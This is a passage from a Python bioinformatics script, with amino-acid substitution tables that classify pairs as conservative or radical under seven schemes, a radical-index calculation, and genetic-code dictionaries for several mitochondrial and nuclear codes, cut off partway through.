","L"):"C",("A","M"):"C",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"R",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"C",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"R",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"C",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},6:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"R",("G","T"):"R",("G","W"):"C",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"R",("T","G"):"R",("W","G"):"C",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},7:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}}
resultsList = []
cri = 0
for scheme in aaSchemeList:
currScheme = aaSchemeDict[scheme]
currValue = currScheme[(aaList[0],aaList[1])]
if currValue == 'R':
cri += 1
resultsList.append(1)
else:
resultsList.append(0)
cri = cri/7.0
resultsList.append(cri)
return resultsList
def buildCodonDict(fasta):
code = 'invertebrateMt'
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 